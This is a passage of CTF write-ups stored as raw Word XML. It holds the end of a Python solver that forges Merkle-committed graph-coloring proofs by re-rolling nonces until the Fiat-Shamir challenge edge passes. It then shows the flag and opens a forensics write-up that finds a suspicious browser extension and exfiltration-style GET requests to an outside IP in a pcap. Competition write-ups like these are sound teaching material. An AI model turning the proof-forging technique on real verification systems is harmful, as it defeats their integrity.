        <w:t xml:space="preserve">    levels=build_levels(leaves)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609139A" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    target=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541D322" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DB78A" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        rhex=root_hex(levels)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586EA19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u,v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>=edges[fs_idx(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>rhex,len</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(edges))]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF8711" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        if colors[u</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>]!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>colors[v]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D63AE" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">            openings</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465CF25" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">            for w in (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>u,v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C89C7A" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">                openings[str(w</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)]=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>{"color</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>":colors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[w],"nonce</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>":nonces</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[w</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>].hex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27CC97" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">                                  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>merkle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>_proof</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>":merkle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>_proof(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>levels,w</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E06F48" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">            return {"merkle_root</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>":rhex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>,"openings</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>":openings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A005D" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        nonces[target]=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>os.urandom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098CB625" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        levels[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>0][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>target]=leaf_hash(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>target,colors</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[target</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>],nonces</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>[target])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634726B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        update_path(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>levels,target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55166FED" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="58D0B714" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C6E41" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    io=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>remote(HOST,PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE9459" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(b"enabled==")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BDE0EA" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    for i in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A4EE4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io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(f"==round {i}==</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>".encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C617185" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        buf=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(b"proof:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CDC5A" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        jline</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">ln for ln in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>buf.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).splitlines</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">() if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>ln.strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).startswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>("{"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE24C9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        g=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">(jline); </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>n,edges</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>=g["n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>],g</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>["edges"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC626C9" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        proof=solve_round(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>n,edges</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAC476" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>io.send</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>((</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>proof,separators</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>=(',',':'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>))+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>"\n"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFBBBC" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">        print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7231DF1B" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>io.recvall</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48F768" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178"/>
    <w:p w14:paraId="50484080" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t xml:space="preserve">if __name__=="__main__": </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3178">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF41BE" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="00000000" w:rsidP="007B3178">
      <w:r>
        <w:pict w14:anchorId="38EE0A0F">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA0EA8" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6 – Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F412DF5" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>Running the solver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CCB32" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>[round 0] ok in 202.9 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C2A08" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C57230" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>[round 49] ok in 245.0 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA69E4" w14:textId="77777777" w:rsidR="007B3178" w:rsidRPr="007B3178" w:rsidRDefault="007B3178" w:rsidP="007B3178">
      <w:r w:rsidRPr="007B3178">
        <w:t>flag: ictf{zero_knowledge_proof_more_like_i_have_zero_knowledge_of_how_to_prove_this}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC19F4" w14:textId="77777777" w:rsidR="007B3178" w:rsidRDefault="007B3178"/>
    <w:p w14:paraId="26CD2AE4" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="3A60E600" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="51C52B35" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="618769CD" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="5943521F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="0540075B" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="7AD2CBD5" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="2ABF5BFB" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="3161350F" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="3D202FB5" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="3A65EB94" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="1A8BC058" w14:textId="77777777" w:rsidR="0095727A" w:rsidRDefault="0095727A"/>
    <w:p w14:paraId="003DF5E5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lastRenderedPageBreak/>
        <w:t>x-tension (100 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EFC26" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> Forensics</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Author:</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> FIREPONY57</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solves:</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> 199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC3338" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="3FBE4CBC">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975C568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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16230D5C" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"Trying to get good at something while watching YouTube isn't the greatest idea..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C44F72" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>We’re given a network capture file (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0095727A">
        <w:t>chal.pcapng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">). The title “x-tension” immediately suggests something related to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>browser extension</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B28BE20" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="0292A9DC">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512B92D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Step 1 – Inspecting the PCAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56CE3C" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">Opening the capture in </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> and filtering for HTTP traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F32BA4C" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821E209" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>I noticed this request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E92074" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>GET /FunnyCatPicsExtension.crx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088EC9ED" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve">That .crx file is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chrome extension package</w:t>
      </w:r>
      <w:r w:rsidRPr="0095727A">
        <w:t xml:space="preserve"> — a strong hint that the challenge involves extension-based traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E53D05" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="00000000" w:rsidP="0095727A">
      <w:r>
        <w:pict w14:anchorId="4F8AFD11">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62E44C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Step 2 – Suspicious HTTP Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD1EA4" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>Scrolling further, I found many suspicious GET requests to an odd IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED23B0" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>GET /?t=5e HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7EF3EC" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
      <w:r w:rsidRPr="0095727A">
        <w:t>Host: 192.9.137.137:42552</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03608E8A" w14:textId="77777777" w:rsidR="0095727A" w:rsidRPr="0095727A" w:rsidRDefault="0095727A" w:rsidP="0095727A">
